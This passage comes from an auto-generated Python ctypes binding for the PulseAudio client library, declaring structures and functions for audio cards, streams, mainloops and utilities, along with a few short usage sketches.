struct_pa_card_profile_info2._fields_ = [
('name', c_char_p),
('description', c_char_p),
('n_sinks', c_uint32),
('n_sources', c_uint32),
('priority', c_uint32),
('available', c_int),
]
pa_card_profile_info2 = struct_pa_card_profile_info2 # /usr/include/pulse/introspect.h:496
class struct_pa_card_port_info(Structure):
__slots__ = [
'name',
'description',
'priority',
'available',
'direction',
'n_profiles',
'profiles',
'proplist',
'latency_offset',
'profiles2',
]
struct_pa_card_port_info._fields_ = [
('name', c_char_p),
('description', c_char_p),
('priority', c_uint32),
('available', c_int),
('direction', c_int),
('n_profiles', c_uint32),
('profiles', POINTER(POINTER(pa_card_profile_info))),
('proplist', POINTER(pa_proplist)),
('latency_offset', c_int64),
('profiles2', POINTER(POINTER(pa_card_profile_info2))),
]
pa_card_port_info = struct_pa_card_port_info # /usr/include/pulse/introspect.h:512
class struct_pa_card_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'driver',
'n_profiles',
'profiles',
'active_profile',
'proplist',
'n_ports',
'ports',
'profiles2',
'active_profile2',
]
struct_pa_card_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('driver', c_char_p),
('n_profiles', c_uint32),
('profiles', POINTER(pa_card_profile_info)),
('active_profile', POINTER(pa_card_profile_info)),
('proplist', POINTER(pa_proplist)),
('n_ports', c_uint32),
('ports', POINTER(POINTER(pa_card_port_info))),
('profiles2', POINTER(POINTER(pa_card_profile_info2))),
('active_profile2', POINTER(pa_card_profile_info2)),
]
pa_card_info = struct_pa_card_info # /usr/include/pulse/introspect.h:530
pa_card_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_card_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:533
# /usr/include/pulse/introspect.h:536
pa_context_get_card_info_by_index = _lib.pa_context_get_card_info_by_index
pa_context_get_card_info_by_index.restype = POINTER(pa_operation)
pa_context_get_card_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:539
pa_context_get_card_info_by_name = _lib.pa_context_get_card_info_by_name
pa_context_get_card_info_by_name.restype = POINTER(pa_operation)
pa_context_get_card_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:542
pa_context_get_card_info_list = _lib.pa_context_get_card_info_list
pa_context_get_card_info_list.restype = POINTER(pa_operation)
pa_context_get_card_info_list.argtypes = [POINTER(pa_context), pa_card_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:545
pa_context_set_card_profile_by_index = _lib.pa_context_set_card_profile_by_index
pa_context_set_card_profile_by_index.restype = POINTER(pa_operation)
pa_context_set_card_profile_by_index.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:548
pa_context_set_card_profile_by_name = _lib.pa_context_set_card_profile_by_name
pa_context_set_card_profile_by_name.restype = POINTER(pa_operation)
pa_context_set_card_profile_by_name.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:551
pa_context_set_port_latency_offset = _lib.pa_context_set_port_latency_offset
pa_context_set_port_latency_offset.restype = POINTER(pa_operation)
pa_context_set_port_latency_offset.argtypes = [POINTER(pa_context), c_char_p, c_char_p, c_int64, pa_context_success_cb_t, POINTER(None)]
class struct_pa_sink_input_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'client',
'sink',
'sample_spec',
'channel_map',
'volume',
'buffer_usec',
'sink_usec',
'resample_method',
'driver',
'mute',
'proplist',
'corked',
'has_volume',
'volume_writable',
'format',
]
struct_pa_sink_input_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('client', c_uint32),
('sink', c_uint32),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('volume', pa_cvolume),
('buffer_usec', pa_usec_t),
('sink_usec', pa_usec_t),
('resample_method', c_char_p),
('driver', c_char_p),
('mute', c_int),
('proplist', POINTER(pa_proplist)),
('corked', c_int),
('has_volume', c_int),
('volume_writable', c_int),
('format', POINTER(pa_format_info)),
]
pa_sink_input_info = struct_pa_sink_input_info # /usr/include/pulse/introspect.h:579
pa_sink_input_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sink_input_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:582
# /usr/include/pulse/introspect.h:585
pa_context_get_sink_input_info = _lib.pa_context_get_sink_input_info
pa_context_get_sink_input_info.restype = POINTER(pa_operation)
pa_context_get_sink_input_info.argtypes = [POINTER(pa_context), c_uint32, pa_sink_input_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:588
pa_context_get_sink_input_info_list = _lib.pa_context_get_sink_input_info_list
pa_context_get_sink_input_info_list.restype = POINTER(pa_operation)
pa_context_get_sink_input_info_list.argtypes = [POINTER(pa_context), pa_sink_input_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:591
pa_context_move_sink_input_by_name = _lib.pa_context_move_sink_input_by_name
pa_context_move_sink_input_by_name.restype = POINTER(pa_operation)
pa_context_move_sink_input_by_name.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:594
pa_context_move_sink_input_by_index = _lib.pa_context_move_sink_input_by_index
pa_context_move_sink_input_by_index.restype = POINTER(pa_operation)
pa_context_move_sink_input_by_index.argtypes = [POINTER(pa_context), c_uint32, c_uint32, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:597
pa_context_set_sink_input_volume = _lib.pa_context_set_sink_input_volume
pa_context_set_sink_input_volume.restype = POINTER(pa_operation)
pa_context_set_sink_input_volume.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
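# Illustrative sketch: setting a sink input to one uniform volume across
# all of its channels via pa_cvolume_set (declared earlier in this module).
def _example_set_input_volume(context, input_index, channels, volume):
    cv = pa_cvolume()
    pa_cvolume_set(byref(cv), channels, volume)
    op = pa_context_set_sink_input_volume(context, input_index, byref(cv),
                                          None, None)
    if op:
        pa_operation_unref(op)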
# /usr/include/pulse/introspect.h:600
pa_context_set_sink_input_mute = _lib.pa_context_set_sink_input_mute
pa_context_set_sink_input_mute.restype = POINTER(pa_operation)
pa_context_set_sink_input_mute.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:603
pa_context_kill_sink_input = _lib.pa_context_kill_sink_input
pa_context_kill_sink_input.restype = POINTER(pa_operation)
pa_context_kill_sink_input.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_source_output_info(Structure):
__slots__ = [
'index',
'name',
'owner_module',
'client',
'source',
'sample_spec',
'channel_map',
'buffer_usec',
'source_usec',
'resample_method',
'driver',
'proplist',
'corked',
'volume',
'mute',
'has_volume',
'volume_writable',
'format',
]
struct_pa_source_output_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('owner_module', c_uint32),
('client', c_uint32),
('source', c_uint32),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('buffer_usec', pa_usec_t),
('source_usec', pa_usec_t),
('resample_method', c_char_p),
('driver', c_char_p),
('proplist', POINTER(pa_proplist)),
('corked', c_int),
('volume', pa_cvolume),
('mute', c_int),
('has_volume', c_int),
('volume_writable', c_int),
('format', POINTER(pa_format_info)),
]
pa_source_output_info = struct_pa_source_output_info # /usr/include/pulse/introspect.h:631
pa_source_output_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_source_output_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:634
# /usr/include/pulse/introspect.h:637
pa_context_get_source_output_info = _lib.pa_context_get_source_output_info
pa_context_get_source_output_info.restype = POINTER(pa_operation)
pa_context_get_source_output_info.argtypes = [POINTER(pa_context), c_uint32, pa_source_output_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:640
pa_context_get_source_output_info_list = _lib.pa_context_get_source_output_info_list
pa_context_get_source_output_info_list.restype = POINTER(pa_operation)
pa_context_get_source_output_info_list.argtypes = [POINTER(pa_context), pa_source_output_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:643
pa_context_move_source_output_by_name = _lib.pa_context_move_source_output_by_name
pa_context_move_source_output_by_name.restype = POINTER(pa_operation)
pa_context_move_source_output_by_name.argtypes = [POINTER(pa_context), c_uint32, c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:646
pa_context_move_source_output_by_index = _lib.pa_context_move_source_output_by_index
pa_context_move_source_output_by_index.restype = POINTER(pa_operation)
pa_context_move_source_output_by_index.argtypes = [POINTER(pa_context), c_uint32, c_uint32, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:649
pa_context_set_source_output_volume = _lib.pa_context_set_source_output_volume
pa_context_set_source_output_volume.restype = POINTER(pa_operation)
pa_context_set_source_output_volume.argtypes = [POINTER(pa_context), c_uint32, POINTER(pa_cvolume), pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:652
pa_context_set_source_output_mute = _lib.pa_context_set_source_output_mute
pa_context_set_source_output_mute.restype = POINTER(pa_operation)
pa_context_set_source_output_mute.argtypes = [POINTER(pa_context), c_uint32, c_int, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:655
pa_context_kill_source_output = _lib.pa_context_kill_source_output
pa_context_kill_source_output.restype = POINTER(pa_operation)
pa_context_kill_source_output.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
class struct_pa_stat_info(Structure):
__slots__ = [
'memblock_total',
'memblock_total_size',
'memblock_allocated',
'memblock_allocated_size',
'scache_size',
]
struct_pa_stat_info._fields_ = [
('memblock_total', c_uint32),
('memblock_total_size', c_uint32),
('memblock_allocated', c_uint32),
('memblock_allocated_size', c_uint32),
('scache_size', c_uint32),
]
pa_stat_info = struct_pa_stat_info # /usr/include/pulse/introspect.h:670
pa_stat_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_stat_info), POINTER(None)) # /usr/include/pulse/introspect.h:673
# /usr/include/pulse/introspect.h:676
pa_context_stat = _lib.pa_context_stat
pa_context_stat.restype = POINTER(pa_operation)
pa_context_stat.argtypes = [POINTER(pa_context), pa_stat_info_cb_t, POINTER(None)]
class struct_pa_sample_info(Structure):
__slots__ = [
'index',
'name',
'volume',
'sample_spec',
'channel_map',
'duration',
'bytes',
'lazy',
'filename',
'proplist',
]
struct_pa_sample_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('volume', pa_cvolume),
('sample_spec', pa_sample_spec),
('channel_map', pa_channel_map),
('duration', pa_usec_t),
('bytes', c_uint32),
('lazy', c_int),
('filename', c_char_p),
('proplist', POINTER(pa_proplist)),
]
pa_sample_info = struct_pa_sample_info # /usr/include/pulse/introspect.h:696
pa_sample_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_sample_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:699
# /usr/include/pulse/introspect.h:702
pa_context_get_sample_info_by_name = _lib.pa_context_get_sample_info_by_name
pa_context_get_sample_info_by_name.restype = POINTER(pa_operation)
pa_context_get_sample_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_sample_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:705
pa_context_get_sample_info_by_index = _lib.pa_context_get_sample_info_by_index
pa_context_get_sample_info_by_index.restype = POINTER(pa_operation)
pa_context_get_sample_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_sample_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:708
pa_context_get_sample_info_list = _lib.pa_context_get_sample_info_list
pa_context_get_sample_info_list.restype = POINTER(pa_operation)
pa_context_get_sample_info_list.argtypes = [POINTER(pa_context), pa_sample_info_cb_t, POINTER(None)]
enum_pa_autoload_type = c_int
PA_AUTOLOAD_SINK = 0
PA_AUTOLOAD_SOURCE = 1
pa_autoload_type_t = enum_pa_autoload_type # /usr/include/pulse/introspect.h:720
class struct_pa_autoload_info(Structure):
__slots__ = [
'index',
'name',
'type',
'module',
'argument',
]
struct_pa_autoload_info._fields_ = [
('index', c_uint32),
('name', c_char_p),
('type', pa_autoload_type_t),
('module', c_char_p),
('argument', c_char_p),
]
pa_autoload_info = struct_pa_autoload_info # /usr/include/pulse/introspect.h:731
pa_autoload_info_cb_t = CFUNCTYPE(None, POINTER(pa_context), POINTER(pa_autoload_info), c_int, POINTER(None)) # /usr/include/pulse/introspect.h:734
# /usr/include/pulse/introspect.h:737
pa_context_get_autoload_info_by_name = _lib.pa_context_get_autoload_info_by_name
pa_context_get_autoload_info_by_name.restype = POINTER(pa_operation)
pa_context_get_autoload_info_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:740
pa_context_get_autoload_info_by_index = _lib.pa_context_get_autoload_info_by_index
pa_context_get_autoload_info_by_index.restype = POINTER(pa_operation)
pa_context_get_autoload_info_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:743
pa_context_get_autoload_info_list = _lib.pa_context_get_autoload_info_list
pa_context_get_autoload_info_list.restype = POINTER(pa_operation)
pa_context_get_autoload_info_list.argtypes = [POINTER(pa_context), pa_autoload_info_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:746
pa_context_add_autoload = _lib.pa_context_add_autoload
pa_context_add_autoload.restype = POINTER(pa_operation)
pa_context_add_autoload.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, c_char_p, c_char_p, pa_context_index_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:749
pa_context_remove_autoload_by_name = _lib.pa_context_remove_autoload_by_name
pa_context_remove_autoload_by_name.restype = POINTER(pa_operation)
pa_context_remove_autoload_by_name.argtypes = [POINTER(pa_context), c_char_p, pa_autoload_type_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/introspect.h:752
pa_context_remove_autoload_by_index = _lib.pa_context_remove_autoload_by_index
pa_context_remove_autoload_by_index.restype = POINTER(pa_operation)
pa_context_remove_autoload_by_index.argtypes = [POINTER(pa_context), c_uint32, pa_context_success_cb_t, POINTER(None)]
pa_context_subscribe_cb_t = CFUNCTYPE(None, POINTER(pa_context), pa_subscription_event_type_t, c_uint32, POINTER(None)) # /usr/include/pulse/subscribe.h:73
# /usr/include/pulse/subscribe.h:76
pa_context_subscribe = _lib.pa_context_subscribe
pa_context_subscribe.restype = POINTER(pa_operation)
pa_context_subscribe.argtypes = [POINTER(pa_context), pa_subscription_mask_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/subscribe.h:79
pa_context_set_subscribe_callback = _lib.pa_context_set_subscribe_callback
pa_context_set_subscribe_callback.restype = None
pa_context_set_subscribe_callback.argtypes = [POINTER(pa_context), pa_context_subscribe_cb_t, POINTER(None)]
pa_context_play_sample_cb_t = CFUNCTYPE(None, POINTER(pa_context), c_uint32, POINTER(None)) # /usr/include/pulse/scache.h:85
# /usr/include/pulse/scache.h:88
pa_stream_connect_upload = _lib.pa_stream_connect_upload
pa_stream_connect_upload.restype = c_int
pa_stream_connect_upload.argtypes = [POINTER(pa_stream), c_size_t]
# /usr/include/pulse/scache.h:93
pa_stream_finish_upload = _lib.pa_stream_finish_upload
pa_stream_finish_upload.restype = c_int
pa_stream_finish_upload.argtypes = [POINTER(pa_stream)]
# /usr/include/pulse/scache.h:96
pa_context_remove_sample = _lib.pa_context_remove_sample
pa_context_remove_sample.restype = POINTER(pa_operation)
pa_context_remove_sample.argtypes = [POINTER(pa_context), c_char_p, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/scache.h:101
pa_context_play_sample = _lib.pa_context_play_sample
pa_context_play_sample.restype = POINTER(pa_operation)
pa_context_play_sample.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_volume_t, pa_context_success_cb_t, POINTER(None)]
# /usr/include/pulse/scache.h:113
pa_context_play_sample_with_proplist = _lib.pa_context_play_sample_with_proplist
pa_context_play_sample_with_proplist.restype = POINTER(pa_operation)
pa_context_play_sample_with_proplist.argtypes = [POINTER(pa_context), c_char_p, c_char_p, pa_volume_t, POINTER(pa_proplist), pa_context_play_sample_cb_t, POINTER(None)]
# /usr/include/pulse/error.h:33
pa_strerror = _lib.pa_strerror
pa_strerror.restype = c_char_p
pa_strerror.argtypes = [c_int]
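# Illustrative sketch: mapping a context's last error to readable text.
def _example_last_error(context):
    code = pa_context_errno(context)
    msg = pa_strerror(code)
    return msg.decode('utf-8') if msg else 'unknown error %d' % code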
# /usr/include/pulse/xmalloc.h:39
pa_xmalloc = _lib.pa_xmalloc
pa_xmalloc.restype = POINTER(None)
pa_xmalloc.argtypes = [c_size_t]
# /usr/include/pulse/xmalloc.h:42
pa_xmalloc0 = _lib.pa_xmalloc0
pa_xmalloc0.restype = POINTER(None)
pa_xmalloc0.argtypes = [c_size_t]
# /usr/include/pulse/xmalloc.h:45
pa_xrealloc = _lib.pa_xrealloc
pa_xrealloc.restype = POINTER(None)
pa_xrealloc.argtypes = [POINTER(None), c_size_t]
# /usr/include/pulse/xmalloc.h:48
pa_xfree = _lib.pa_xfree
pa_xfree.restype = None
pa_xfree.argtypes = [POINTER(None)]
# /usr/include/pulse/xmalloc.h:51
pa_xstrdup = _lib.pa_xstrdup
pa_xstrdup.restype = c_char_p
pa_xstrdup.argtypes = [c_char_p]
# /usr/include/pulse/xmalloc.h:54
pa_xstrndup = _lib.pa_xstrndup
pa_xstrndup.restype = c_char_p
pa_xstrndup.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/xmalloc.h:57
pa_xmemdup = _lib.pa_xmemdup
pa_xmemdup.restype = POINTER(None)
pa_xmemdup.argtypes = [POINTER(None), c_size_t]
# /usr/include/pulse/utf8.h:35
pa_utf8_valid = _lib.pa_utf8_valid
pa_utf8_valid.restype = c_char_p
pa_utf8_valid.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:38
pa_ascii_valid = _lib.pa_ascii_valid
pa_ascii_valid.restype = c_char_p
pa_ascii_valid.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:41
pa_utf8_filter = _lib.pa_utf8_filter
pa_utf8_filter.restype = c_char_p
pa_utf8_filter.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:44
pa_ascii_filter = _lib.pa_ascii_filter
pa_ascii_filter.restype = c_char_p
pa_ascii_filter.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:47
pa_utf8_to_locale = _lib.pa_utf8_to_locale
pa_utf8_to_locale.restype = c_char_p
pa_utf8_to_locale.argtypes = [c_char_p]
# /usr/include/pulse/utf8.h:50
pa_locale_to_utf8 = _lib.pa_locale_to_utf8
pa_locale_to_utf8.restype = c_char_p
pa_locale_to_utf8.argtypes = [c_char_p]
class struct_pa_threaded_mainloop(Structure):
__slots__ = [
]
struct_pa_threaded_mainloop._fields_ = [
('_opaque_struct', c_int)
]
pa_threaded_mainloop = struct_pa_threaded_mainloop # /usr/include/pulse/thread-mainloop.h:246
# /usr/include/pulse/thread-mainloop.h:251
pa_threaded_mainloop_new = _lib.pa_threaded_mainloop_new
pa_threaded_mainloop_new.restype = POINTER(pa_threaded_mainloop)
pa_threaded_mainloop_new.argtypes = []
# /usr/include/pulse/thread-mainloop.h:256
pa_threaded_mainloop_free = _lib.pa_threaded_mainloop_free
pa_threaded_mainloop_free.restype = None
pa_threaded_mainloop_free.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:259
pa_threaded_mainloop_start = _lib.pa_threaded_mainloop_start
pa_threaded_mainloop_start.restype = c_int
pa_threaded_mainloop_start.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:263
pa_threaded_mainloop_stop = _lib.pa_threaded_mainloop_stop
pa_threaded_mainloop_stop.restype = None
pa_threaded_mainloop_stop.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:271
pa_threaded_mainloop_lock = _lib.pa_threaded_mainloop_lock
pa_threaded_mainloop_lock.restype = None
pa_threaded_mainloop_lock.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:274
pa_threaded_mainloop_unlock = _lib.pa_threaded_mainloop_unlock
pa_threaded_mainloop_unlock.restype = None
pa_threaded_mainloop_unlock.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:285
pa_threaded_mainloop_wait = _lib.pa_threaded_mainloop_wait
pa_threaded_mainloop_wait.restype = None
pa_threaded_mainloop_wait.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:292
pa_threaded_mainloop_signal = _lib.pa_threaded_mainloop_signal
pa_threaded_mainloop_signal.restype = None
pa_threaded_mainloop_signal.argtypes = [POINTER(pa_threaded_mainloop), c_int]
# /usr/include/pulse/thread-mainloop.h:298
pa_threaded_mainloop_accept = _lib.pa_threaded_mainloop_accept
pa_threaded_mainloop_accept.restype = None
pa_threaded_mainloop_accept.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:302
pa_threaded_mainloop_get_retval = _lib.pa_threaded_mainloop_get_retval
pa_threaded_mainloop_get_retval.restype = c_int
pa_threaded_mainloop_get_retval.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:307
pa_threaded_mainloop_get_api = _lib.pa_threaded_mainloop_get_api
pa_threaded_mainloop_get_api.restype = POINTER(pa_mainloop_api)
pa_threaded_mainloop_get_api.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:310
pa_threaded_mainloop_in_thread = _lib.pa_threaded_mainloop_in_thread
pa_threaded_mainloop_in_thread.restype = c_int
pa_threaded_mainloop_in_thread.argtypes = [POINTER(pa_threaded_mainloop)]
# /usr/include/pulse/thread-mainloop.h:313
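# Disabled: pa_threaded_mainloop_set_name is missing from older libpulse
# builds (assumption), so the eager lookup below is left commented out.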
#pa_threaded_mainloop_set_name = _lib.pa_threaded_mainloop_set_name
#pa_threaded_mainloop_set_name.restype = None
#pa_threaded_mainloop_set_name.argtypes = [POINTER(pa_threaded_mainloop), c_char_p]
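# Illustrative sketch: the canonical lock/wait pattern for the threaded
# mainloop. This assumes a context state callback elsewhere calls
# pa_threaded_mainloop_signal whenever the state changes;
# pa_threaded_mainloop_wait then wakes us to re-check. All libpulse calls
# here must run with the loop locked.
def _example_wait_until_ready(mainloop, context):
    pa_threaded_mainloop_lock(mainloop)
    try:
        while True:
            state = pa_context_get_state(context)
            if state == PA_CONTEXT_READY:
                return True
            if state in (PA_CONTEXT_FAILED, PA_CONTEXT_TERMINATED):
                return False
            pa_threaded_mainloop_wait(mainloop)
    finally:
        pa_threaded_mainloop_unlock(mainloop)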
class struct_pa_mainloop(Structure):
__slots__ = [
]
struct_pa_mainloop._fields_ = [
('_opaque_struct', c_int)
]
pa_mainloop = struct_pa_mainloop # /usr/include/pulse/mainloop.h:78
# /usr/include/pulse/mainloop.h:81
pa_mainloop_new = _lib.pa_mainloop_new
pa_mainloop_new.restype = POINTER(pa_mainloop)
pa_mainloop_new.argtypes = []
# /usr/include/pulse/mainloop.h:84
pa_mainloop_free = _lib.pa_mainloop_free
pa_mainloop_free.restype = None
pa_mainloop_free.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:89
pa_mainloop_prepare = _lib.pa_mainloop_prepare
pa_mainloop_prepare.restype = c_int
pa_mainloop_prepare.argtypes = [POINTER(pa_mainloop), c_int]
# /usr/include/pulse/mainloop.h:92
pa_mainloop_poll = _lib.pa_mainloop_poll
pa_mainloop_poll.restype = c_int
pa_mainloop_poll.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:96
pa_mainloop_dispatch = _lib.pa_mainloop_dispatch
pa_mainloop_dispatch.restype = c_int
pa_mainloop_dispatch.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:99
pa_mainloop_get_retval = _lib.pa_mainloop_get_retval
pa_mainloop_get_retval.restype = c_int
pa_mainloop_get_retval.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:107
pa_mainloop_iterate = _lib.pa_mainloop_iterate
pa_mainloop_iterate.restype = c_int
pa_mainloop_iterate.argtypes = [POINTER(pa_mainloop), c_int, POINTER(c_int)]
# /usr/include/pulse/mainloop.h:110
pa_mainloop_run = _lib.pa_mainloop_run
pa_mainloop_run.restype = c_int
pa_mainloop_run.argtypes = [POINTER(pa_mainloop), POINTER(c_int)]
# /usr/include/pulse/mainloop.h:115
pa_mainloop_get_api = _lib.pa_mainloop_get_api
pa_mainloop_get_api.restype = POINTER(pa_mainloop_api)
pa_mainloop_get_api.argtypes = [POINTER(pa_mainloop)]
# /usr/include/pulse/mainloop.h:118
pa_mainloop_quit = _lib.pa_mainloop_quit
pa_mainloop_quit.restype = None
pa_mainloop_quit.argtypes = [POINTER(pa_mainloop), c_int]
# /usr/include/pulse/mainloop.h:121
pa_mainloop_wakeup = _lib.pa_mainloop_wakeup
pa_mainloop_wakeup.restype = None
pa_mainloop_wakeup.argtypes = [POINTER(pa_mainloop)]
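# Illustrative sketch: driving the non-threaded mainloop by hand. Each
# iteration prepares, polls (blocking here), and dispatches events; a
# negative return means pa_mainloop_quit was called.
def _example_iterate_once(mainloop):
    retval = c_int(0)
    if pa_mainloop_iterate(mainloop, 1, byref(retval)) < 0:
        return retval.value
    return None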
class struct_pollfd(Structure):
__slots__ = [
]
struct_pollfd._fields_ = [
('_opaque_struct', c_int)
]
pa_poll_func = CFUNCTYPE(c_int, POINTER(struct_pollfd), c_ulong, c_int, POINTER(None)) # /usr/include/pulse/mainloop.h:124
# /usr/include/pulse/mainloop.h:127
pa_mainloop_set_poll_func = _lib.pa_mainloop_set_poll_func
pa_mainloop_set_poll_func.restype = None
pa_mainloop_set_poll_func.argtypes = [POINTER(pa_mainloop), pa_poll_func, POINTER(None)]
class struct_pa_signal_event(Structure):
__slots__ = [
]
struct_pa_signal_event._fields_ = [
('_opaque_struct', c_int)
]
pa_signal_event = struct_pa_signal_event # /usr/include/pulse/mainloop-signal.h:39
pa_signal_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_signal_event), c_int, POINTER(None)) # /usr/include/pulse/mainloop-signal.h:42
pa_signal_destroy_cb_t = CFUNCTYPE(None, POINTER(pa_mainloop_api), POINTER(pa_signal_event), POINTER(None)) # /usr/include/pulse/mainloop-signal.h:45
# /usr/include/pulse/mainloop-signal.h:48
pa_signal_init = _lib.pa_signal_init
pa_signal_init.restype = c_int
pa_signal_init.argtypes = [POINTER(pa_mainloop_api)]
# /usr/include/pulse/mainloop-signal.h:51
pa_signal_done = _lib.pa_signal_done
pa_signal_done.restype = None
pa_signal_done.argtypes = []
# /usr/include/pulse/mainloop-signal.h:54
pa_signal_new = _lib.pa_signal_new
pa_signal_new.restype = POINTER(pa_signal_event)
pa_signal_new.argtypes = [c_int, pa_signal_cb_t, POINTER(None)]
# /usr/include/pulse/mainloop-signal.h:57
pa_signal_free = _lib.pa_signal_free
pa_signal_free.restype = None
pa_signal_free.argtypes = [POINTER(pa_signal_event)]
# /usr/include/pulse/mainloop-signal.h:60
pa_signal_set_destroy = _lib.pa_signal_set_destroy
pa_signal_set_destroy.restype = None
pa_signal_set_destroy.argtypes = [POINTER(pa_signal_event), pa_signal_destroy_cb_t]
# /usr/include/pulse/util.h:35
pa_get_user_name = _lib.pa_get_user_name
pa_get_user_name.restype = c_char_p
pa_get_user_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:38
pa_get_host_name = _lib.pa_get_host_name
pa_get_host_name.restype = c_char_p
pa_get_host_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:41
pa_get_fqdn = _lib.pa_get_fqdn
pa_get_fqdn.restype = c_char_p
pa_get_fqdn.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:44
pa_get_home_dir = _lib.pa_get_home_dir
pa_get_home_dir.restype = c_char_p
pa_get_home_dir.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:48
pa_get_binary_name = _lib.pa_get_binary_name
pa_get_binary_name.restype = c_char_p
pa_get_binary_name.argtypes = [c_char_p, c_size_t]
# /usr/include/pulse/util.h:52
pa_path_get_filename = _lib.pa_path_get_filename
pa_path_get_filename.restype = c_char_p
pa_path_get_filename.argtypes = [c_char_p]
# /usr/include/pulse/util.h:55
pa_msleep = _lib.pa_msleep
pa_msleep.restype = c_int
pa_msleep.argtypes = [c_ulong]
# /usr/include/pulse/timeval.h:61
pa_gettimeofday = _lib.pa_gettimeofday
pa_gettimeofday.restype = POINTER(struct_timeval)
pa_gettimeofday.argtypes = [POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:65
pa_timeval_diff = _lib.pa_timeval_diff
pa_timeval_diff.restype = pa_usec_t
pa_timeval_diff.argtypes = [POINTER(struct_timeval), POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:68
pa_timeval_cmp = _lib.pa_timeval_cmp
pa_timeval_cmp.restype = c_int
pa_timeval_cmp.argtypes = [POINTER(struct_timeval), POINTER(struct_timeval)]
# /usr/include/pulse/timeval.h:71
pa_timeval_age = _lib.pa_timeval_age
